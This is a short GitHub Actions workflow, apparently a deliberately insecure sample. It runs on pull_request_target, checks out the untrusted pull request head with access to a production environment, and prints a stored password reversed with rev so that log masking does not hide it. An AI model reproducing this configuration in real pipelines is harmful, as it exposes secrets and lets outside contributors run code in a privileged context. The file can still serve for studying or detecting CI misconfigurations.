name: ci
on:
  pull_request_target:
    branches: [ main ]
jobs:
  build:
    runs-on: ubuntu-latest
    environment: prod
    steps:
      - uses: actions/checkout@v2
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - name: Log password
        run: echo "${{ secrets.PASSWORD }}" | rev

